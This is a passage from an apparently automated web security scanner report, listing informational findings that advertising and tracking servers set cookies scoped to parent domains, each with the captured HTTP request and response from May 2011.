Set-Cookie: u2=0354b6eb-fc5d-4f2c-b244-3b1b2becc2f03I502g; expires=Sat, 13-Aug-2011 13:35:37 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 15 May 2011 17:35:37 GMT
Connection: close


13.11. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/BannerSource.asp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/BannerSource.asp?FlightID=1686177&Page=&PluID=0&Pos=9946 HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: eyeblaster=FLV=0&RES=128&WMPV=0; B3=98IM0000000000uz6rGx0000000003uE9v950000000001uz94DX0000000002uz; A3=jy8xaLyu0drF00001iCYmaLtc0bnA00002cM5KaNgA0aR600003iN4OaLyu0d9d00000; C4=; u2=0354b6eb-fc5d-4f2c-b244-3b1b2becc2f03I5020; ActivityInfo=000iPlceU%5f;

Response

HTTP/1.1 302 Object moved
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Location: http://ds.serving-sys.com/BurstingRes/Site-8706/Type-0/2431cb34-cff9-4ab3-9273-74ecfd5a422b.jpg
Server: Microsoft-IIS/7.5
Set-Cookie: A3=jy8xaLyu0drF00001iCYmaLtc0bnA00002iN4OaLyu0d9d00000cM5KaNgL0aR600004; expires=Sat, 13-Aug-2011 13:35:37 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=98IM0000000000uz6rGx0000000004uE9v950000000001uz94DX0000000002uz; expires=Sat, 13-Aug-2011 13:35:37 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=0354b6eb-fc5d-4f2c-b244-3b1b2becc2f03I502g; expires=Sat, 13-Aug-2011 13:35:37 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C_9946=3342702
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 15 May 2011 17:35:36 GMT
Connection: close


13.12. http://bs.serving-sys.com/BurstingPipe/adServer.bs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=3342702~~0~~~^ebAboveTheFold~0~0~01020^ebAdDuration~13~0~01020^ebAboveTheFoldDuration~13~0~01020&OptOut=0&ebRandom=0.7164087416689661&flv=0&wmpv=0&res=128 HTTP/1.1
Host: bs.serving-sys.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.orcon.net.nz/work/=&ref=iserve
Origin: http://www.orcon.net.nz

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=21d174dd-3f5d-459b-a330-ba895f3165fa3I5040; expires=Sat, 13-Aug-2011 13:23:20 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=FLV=0&RES=128&WMPV=0; expires=Sat, 13-Aug-2011 13:23:20 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 15 May 2011 17:23:20 GMT
Connection: close
Content-Length: 0


13.13. http://bs.serving-sys.com/BurstingPipe/adServer.bs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=1686177&PluID=0&w=920&h=160&ord=[timestamp]&ucm=true&z=0 HTTP/1.1
Host: bs.serving-sys.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.orcon.net.nz/work/=&ref=iserve
Cookie: A3=jy8xaLyu0drF00001iCYmaLtc0bnA00002iN4OaLyu0d9d00000; B3=98IM0000000000uz9v950000000001uz94DX0000000002uz; u2=e1292900-528b-4d66-83e8-593dd8b9e2433I004g; C4=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A3=jy8xaLyu0drF00001iCYmaLtc0bnA00002cM5KaNgz0aR600001iN4OaLyu0d9d00000; expires=Sat, 13-Aug-2011 13:23:02 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=98IM0000000000uz6rGx0000000001uE9v950000000001uz94DX0000000002uz; expires=Sat, 13-Aug-2011 13:23:02 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 15 May 2011 17:23:01 GMT
Connection: close
Content-Length: 1677

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

13.14. http://c7.zedo.com/bar/v16-406/c5/jsc/gl.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-406/c5/jsc/gl.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bar/v16-406/c5/jsc/gl.js?lYrOTcGt89Yz1ao6zwEmLiof~051411 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=496;c=121;s=1;d=9;w=300;h=250;p=;q=index&t=6015
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=lYrOTcGt89Yz1ao6zwEmLiof~051411; ZEDOIDX=29; FFgeo=2241452

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 399
Content-Type: application/x-javascript
Set-Cookie: FFgeo=2241452;expires=Mon, 14 May 2012 18:35:37 GMT;domain=.zedo.com;path=/;
ETag: "867f4fee-5d7-4a1e2463e2000"
Vary: Accept-Encoding
X-Varnish: 545954212 545953506
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=99423
Expires: Mon, 16 May 2011 22:12:40 GMT
Date: Sun, 15 May 2011 18:35:37 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var zzl='en-US';


if(typeof zzGeo=='undefined'){
var zzGeo=254;}
if(typeof zzCountry=='undefined'){
var zzCountry=255;}
if(typeof
...[SNIP]...

13.15. http://cms.ad.yieldmanager.net/v1/cms  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cms.ad.yieldmanager.net
Path:   /v1/cms

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /v1/cms?esig=1~ed097b82db382a1fd455fb947bcd01b57e206e42&nwid=10000040578&SIG=10vppft4v;x-cookie=rqa6d5q6g078o&o=4&f=x0 HTTP/1.1
Host: cms.ad.yieldmanager.net
Proxy-Connection: keep-alive
Referer: http://uac.advertising.com/wrapper/aceUACping.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 15 May 2011 18:35:55 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: BX=edn6q5d6t078b&b=4&s=k0&t=134;path=/; expires=Tue, 02-Jun-2037 20:00:00 GMT;domain=.yieldmanager.net
Set-Cookie: S=s=dc3evvl6t078b&t=1305484555;path=/; expires=
Location: http://cmap.rm.ace.advertising.com/ycms.ashx?xid=oVQywpGM747YRJASw.Qng7lH
Cache-Control: private
Connection: close
Content-Type: text/plain; charset=utf-8
Content-Length: 792

HTTP/1.1 302 Found
Date: Sun, 15 May 2011 18:35:55 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PU
...[SNIP]...

13.16. http://code.google.com/p/swfobject/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://code.google.com
Path:   /p/swfobject/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p/swfobject/ HTTP/1.1
Host: code.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 17:35:37 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Set-Cookie: PREF=ID=7816bb4773bf94c0:TM=1305480937:LM=1305480937:S=KhHm7h3NK_FJFcaN; expires=Tue, 14-May-2013 17:35:37 GMT; path=/; domain=.google.com
Server: codesite
X-XSS-Protection: 1; mode=block
Connection: close


<!DOCTYPE html>
<html>
<head>
<link rel="icon" type="image/vnd.microsoft.icon" href="http://www.gstatic.com/codesite/ph/images/phosting.ico">

<script type="text/javascript">


var codesit
...[SNIP]...

13.17. http://cookex.amp.yahoo.com/v2/cexposer/SIG=13ahi2098/*http%3A//cms.ad.yieldmanager.net/v1/cms  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cookex.amp.yahoo.com
Path:   /v2/cexposer/SIG=13ahi2098/*http%3A//cms.ad.yieldmanager.net/v1/cms

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /v2/cexposer/SIG=13ahi2098/*http%3A//cms.ad.yieldmanager.net/v1/cms?esig=1~ed097b82db382a1fd455fb947bcd01b57e206e42&nwid=10000040578 HTTP/1.1
Host: cookex.amp.yahoo.com
Proxy-Connection: keep-alive
Referer: http://uac.advertising.com/wrapper/aceUACping.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 15 May 2011 18:35:55 GMT
Set-Cookie: B=c9crd3l6t078b&b=3&s=qs; expires=Tue, 15-May-2013 20:00:00 GMT; path=/; domain=.yahoo.com
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Location: http://cms.ad.yieldmanager.net/v1/cms?esig=1~ed097b82db382a1fd455fb947bcd01b57e206e42&nwid=10000040578&SIG=10vlhrtor;x-cookie=p9peq3y6g078o&o=4&f=3i
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Cache-Control: private
Content-Length: 93

<!-- cookex2.cl2.ads.adx.ac4.yahoo.com uncompressed/chunked Sun May 15 18:35:55 UTC 2011 -->

13.18. http://ib.adnxs.com/getuid  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /getuid

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /getuid?http://cmap.an.ace.advertising.com/ancm.ashx?appnexus_uid=$UID HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://uac.advertising.com/wrapper/aceUACping.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess=1; uuid2=3420415245200633085; anj=Kfu=8fG3x=Cxrx)0s]#%2L_'x%SEV/hnKu9]%)u#^pig7$WZVCh6[VnDM]EZ3hod8Fe@oQ$9==x(O*UO

Response

HTTP/1.1 302 Moved
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 16-May-2011 18:35:55 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Sat, 13-Aug-2011 18:35:55 GMT; domain=.adnxs.com; HttpOnly
Location: http://cmap.an.ace.advertising.com/ancm.ashx?appnexus_uid=3420415245200633085
Date: Sun, 15 May 2011 18:35:55 GMT
Content-Length: 0


13.19. http://ib.adnxs.com/seg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /seg

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /seg?add_code=impx-44127&member=30 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.kosmix.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anj=Kfu=8fG3x=Cxrx)0s]#%2L_'x%SEV/hnKu9]%)u#^pig7$WZVCh6[VnDM]EZ3hod8Fe@oQ$9==x(O*UO; sess=1; uuid2=3420415245200633085

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 16-May-2011 20:00:52 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Sat, 13-Aug-2011 20:00:52 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Sat, 13-Aug-2011 20:00:52 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG3x=Cxrx)0s]#%2L_'x%SEV/hnKu9]%)u#^pig7$WZVCh6[VnDM]EZ3hod8Fe@oQ$9==x(O*UO; path=/; expires=Sat, 13-Aug-2011 20:00:52 GMT; domain=.adnxs.com; HttpOnly
Content-Length: 43
Content-Type: image/gif
Date: Sun, 15 May 2011 20:00:52 GMT

GIF89a.............!.......,........@..L..;

13.20. http://ic.tynt.com/b/p  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ic.tynt.com
Path:   /b/p

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/p?id=aH4rgeyDqr35CXadbi-bpO&ts=1305489649099&t=Kosmix%3A%20The%20web%20organized%20for%20you HTTP/1.1
Host: ic.tynt.com
Proxy-Connection: keep-alive
Referer: http://www.kosmix.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Sun, 15 May 2011 20:00:53 GMT
Content-Type: image/gif
Content-Length: 35
Last-Modified: Fri, 16 Apr 2010 15:38:20 GMT
Connection: close
Cache-Control: "no-store, no-cache, must-revalidate, post-check=0, pre-check=0, false"
Expires: "Sat, 26 Jul 1997 05:00:00 GMT"
Set-Cookie: uid=CgUVZk3QMPV0vQoyDADuAg==; expires=Mon, 14-May-12 20:00:53 GMT; domain=tynt.com; path=/
P3P: policyref="/w3c/p3p.xml", CP="CUR ADM OUR NOR STA NID"
Accept-Ranges: bytes

GIF89a.............,...........D..;

13.21. http://m.adnxs.com/msftcookiehandler  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m.adnxs.com
Path:   /msftcookiehandler

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /msftcookiehandler?t=1&c= HTTP/1.1
Host: m.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.righthealth.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess=1; uuid2=3420415245200633085; anj=Kfu=8fG5+^Cxrx)0s]#%2L_'x%SEV/hnK]1]%)u#^pig7$W[c#Nv?q+O.JPTaAJ6dMys4SK'wFPAQFp.dMq!LfS)mzXh]:[^WX?#

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 16-May-2011 20:03:22 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Sat, 13-Aug-2011 20:03:22 GMT; domain=.adnxs.com; HttpOnly
Content-Length: 43
Content-Type: image/gif
Date: Sun, 15 May 2011 20:03:22 GMT

GIF89a.............!.......,........@..L..;

13.22. http://pixel.quantserve.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel;r=760374081;fpan=0;fpa=P0-1020015937-1305484533946;ns=0;url=http%3A%2F%2Fwww.tagged.com%2F%23;ref=;ce=1;je=1;sr=1920x1200x32;enc=n;ogl=;dst=1;et=1305484536868;tzo=300;a=p-96ZHBHvG56-qg HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://www.tagged.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4dcd4b82-3e074-feeab-8b152; d=ELMBMAHgBoEQCroimFCoMKmRDNEGD7IJiRCIYA

Response

HTTP/1.1 302 Found
Connection: close
Location: http://www.burstnet.com/enlightn/7110//820E/
Set-Cookie: d=EDQBMwHgBoEQCroimFCoMKmRDNEGD7IO1wqhCIYA; expires=Sat, 13-Aug-2011 18:35:36 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 0
Date: Sun, 15 May 2011 18:35:36 GMT
Server: QS


13.23. http://pixel.rubiconproject.com/tap.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?nid=2146&put=xn7ja41kw4np53teeikidoecxeh9fu6s&expires=30 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://uac.advertising.com/wrapper/aceUACping.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 18:35:56 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=deleted; expires=Sat, 15-May-2010 18:35:55 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=deleted; expires=Sat, 15-May-2010 18:35:55 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_2146=xn7ja41kw4np53teeikidoecxeh9fu6s; expires=Tue, 14-Jun-2011 18:35:56 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

13.24. http://r1-ads.ace.advertising.com/ctst=1/site=704672/size=728090/u=2/bnum=38037262/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /ctst=1/site=704672/size=728090/u=2/bnum=38037262/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ctst=1/site=704672/size=728090/u=2/bnum=38037262/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=496;c=121;s=1;d=14;w=728;h=90;p=;q=index&t=6015
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2=DJ9zNFJwIsb0F7RqHjQCiZAc; ACID=oH320013054845430008; ASCID=oH320013054845430008

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 15 May 2011 18:35:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.950393.704672.0XMC
Set-Cookie: C2=/zB0NFJwIsb0F8QqHjQCiZEY; domain=advertising.com; expires=Tue, 14-May-2013 18:35:43 GMT; path=/
Set-Cookie: F1=B8PHQ3kAAAAAgCsCAEAAgEABAAAABAAAAEAAgEA; domain=advertising.com; expires=Tue, 14-May-2013 18:35:43 GMT; path=/
Set-Cookie: BASE=wwg5HQEgpLNiwLL!; domain=advertising.com; expires=Tue, 14-May-2013 18:35:43 GMT; path=/
Set-Cookie: ROLL=qkAeqwzAXdC5GkA!; domain=advertising.com; expires=Tue, 14-May-2013 18:35:43 GMT; path=/
Set-Cookie: 38037262=_4dd01cff,2878432453,704672^950393^1183^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 15 May 2011 18:35:43 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 600

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5155.272756.AOL-ADVERTISING/B5116932;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000704672/mnum
...[SNIP]...

13.25. http://r1-ads.ace.advertising.com/ctst=1/site=776692/size=728090/u=2/bnum=75068257/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /ctst=1/site=776692/size=728090/u=2/bnum=75068257/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ctst=1/site=776692/size=728090/u=2/bnum=75068257/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=496;c=121;s=1;d=14;w=728;h=90;p=;q=index&t=8004
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2=DJ9zNFJwIsb0F7RqHjQCiZAc; ACID=qw280013054845430029; ASCID=qw280013054845430029

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 15 May 2011 18:35:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.950393.776692.0XMC
Set-Cookie: C2=A0B0NFJwIsb0F8QqHjQCiZEY; domain=advertising.com; expires=Tue, 14-May-2013 18:35:44 GMT; path=/
Set-Cookie: F1=BAQHQ3EBAAAABAAAAEAAgEA; domain=advertising.com; expires=Tue, 14-May-2013 18:35:44 GMT; path=/
Set-Cookie: BASE=x7Q9Bi23SwnkpMN!; domain=advertising.com; expires=Tue, 14-May-2013 18:35:44 GMT; path=/
